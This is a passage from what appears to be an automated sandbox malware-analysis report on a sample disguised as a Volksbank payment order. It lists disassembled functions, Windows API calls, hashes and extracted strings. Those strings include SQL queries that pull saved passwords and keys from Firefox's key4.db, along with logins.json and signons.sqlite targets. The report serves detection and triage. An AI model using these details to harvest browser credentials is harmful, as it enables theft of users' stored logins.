                                                                                                                                                                                                                                          • Opcode ID: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                                                                                                                                                          • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                                                                                                                                                                          Function 0040BBF0 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 300windowregistrystringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                                                                                                                                            • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
                                                                                                                                                                                                                                          • SetMenu.USER32(?,00000000), ref: 0040BD23
                                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
                                                                                                                                                                                                                                          • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
                                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
                                                                                                                                                                                                                                          • LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
                                                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040BE93
                                                                                                                                                                                                                                          • RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
                                                                                                                                                                                                                                          • SetFocus.USER32(?,00000000), ref: 0040BECE
                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
                                                                                                                                                                                                                                          • GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040BEFE
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040BF0C
                                                                                                                                                                                                                                          • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
                                                                                                                                                                                                                                            • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
                                                                                                                                                                                                                                            • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040BFDB
                                                                                                                                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 0040BFFF
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                                                                                                                                                                                                          • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                                                                                                                                                                          • API String ID: 2303586283-933021314
                                                                                                                                                                                                                                          • Opcode ID: ee83ce8392c91b6a1376ce061df6a688643c70b4fadf0565b78a002f471a3540
                                                                                                                                                                                                                                          • Instruction ID: 018683a0c001df71ea8fb117e25ab04faf3265e4b472b332b07084323bdedb2f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee83ce8392c91b6a1376ce061df6a688643c70b4fadf0565b78a002f471a3540
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5DC1C071644388FFEB15DF64CC45BDABBA5FF14304F04016AFA44A7292C7B5A904CBA9
                                                                                                                                                                                                                                          Function 0044257F Relevance: 33.4, APIs: 7, Strings: 15, Instructions: 375COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                                                                                                                                                          • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                                                                                                                                                                                          • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                                                                                                                                                                                          • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                                                                                                                                                                                          • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                                                                                                                                                                                          • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcmp$memcpy
                                                                                                                                                                                                                                          • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                                                                                                                                          • API String ID: 231171946-2189169393
                                                                                                                                                                                                                                          • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                                                                                                          • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                                                                                                                                                                          Function 0041108D Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                                                                                                                                          • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                                                                          • API String ID: 633282248-1996832678
                                                                                                                                                                                                                                          • Opcode ID: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                                                                                                                                                          • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                                                                                                                                                                          Function 00406746 Relevance: 30.3, APIs: 16, Strings: 4, Instructions: 287COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00406782
                                                                                                                                                                                                                                            • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                                            • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                                                                                                                                                                          • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                                                                                                                                                                          • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                                                                                                                                                                          • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                                                                                                                                                                                                                          • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                                                                                                                                                                          • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                                                                                                                                                                          • , xrefs: 00406834
                                                                                                                                                                                                                                          • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                                                                                                                                                                          • key4.db, xrefs: 00406756
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$memcmp$memsetstrlen
                                                                                                                                                                                                                                          • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                                                                                                                                                          • API String ID: 3614188050-3983245814
                                                                                                                                                                                                                                          • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                                                                                                          • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                                                                                                                                                                          Function 0040A953 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 182COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040A973
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040A996
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040A9AC
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040A9BC
                                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040A9F0
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(00000000, nowrap), ref: 0040AA37
                                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040AABE
                                                                                                                                                                                                                                          • _mbscat.MSVCRT ref: 0040AAED
                                                                                                                                                                                                                                            • Part of subcall function 00410FD3: sprintf.MSVCRT ref: 00410FF7
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?), ref: 0040AAD2
                                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040AB21
                                                                                                                                                                                                                                            • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                                                            • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,76940A60,00000000,?,?,0040A7BE,00000001,0044CBC0,76940A60), ref: 00406D4D
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                                                                                                                                                          • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                                                          • API String ID: 710961058-601624466
                                                                                                                                                                                                                                          • Opcode ID: c33c3296b7e77e76534675bd69894b8e30877f2258b439036e8e249278821d93
                                                                                                                                                                                                                                          • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c33c3296b7e77e76534675bd69894b8e30877f2258b439036e8e249278821d93
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                                                                                                                                                                                                                          Function 004111AA Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: sprintf$memset$_mbscpy
                                                                                                                                                                                                                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                                                          • API String ID: 3402215030-3842416460
                                                                                                                                                                                                                                          • Opcode ID: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                                                                                                                                                          • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                                                                                                                                                                          Function 0040F0CE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 192stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                                                                                                                                                            • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                                                                                                                                                                            • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                                                                                                                                                            • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                                                                                                                                                            • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                                                                                                                                                            • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                                                                                                                                                            • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                                                                                                                                                            • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                                                            • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                                                                                                                            • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                                                                                                                            • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040F139
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040F147
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040F187
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040F196
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040F1A4
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040F1EA
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040F1F9
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040F207
                                                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                                                                                                                                                            • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                                                                            • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                                                                                                                                                          • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                                                                                                                                          • API String ID: 2003275452-3138536805
                                                                                                                                                                                                                                          • Opcode ID: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                                                                                                                                                          • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                                                                                                                                                                          Function 0040C3D0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 111stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040C3F7
                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                                                                                                                                                          • strrchr.MSVCRT ref: 0040C417
                                                                                                                                                                                                                                          • _mbscat.MSVCRT ref: 0040C431
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                                                                                                                                                          • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                                                                                                                                          • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                                                                                                                                                          • API String ID: 1012775001-1343505058
                                                                                                                                                                                                                                          • Opcode ID: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                                                                                                                                                          • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                                                                                                                                                                          Function 0040CDDA Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _strcmpi
                                                                                                                                                                                                                                          • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                                                                          • API String ID: 1439213657-1959339147
                                                                                                                                                                                                                                          • Opcode ID: fc398c435b3d1a27aa6bafcedfb0a9c88799152dfe3da8b7518a640bbec7b317
                                                                                                                                                                                                                                          • Instruction ID: 098916069379b780452bf0adc0bc0339f4c30180c2e3981bbd8ab1a2d20b7c26
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc398c435b3d1a27aa6bafcedfb0a9c88799152dfe3da8b7518a640bbec7b317
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F01446768576224F924226ABC17F870B44CF91BBAF31015FF519D94D5EF5CA04050AC
                                                                                                                                                                                                                                          Function 004445ED Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00444612
                                                                                                                                                                                                                                            • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0044462E
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00444668
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0044467C
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00444690
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004446B6
                                                                                                                                                                                                                                            • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                                                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                                                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                                                                            • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                                                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                                                                                                                                                            • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                                                                            • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                                                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
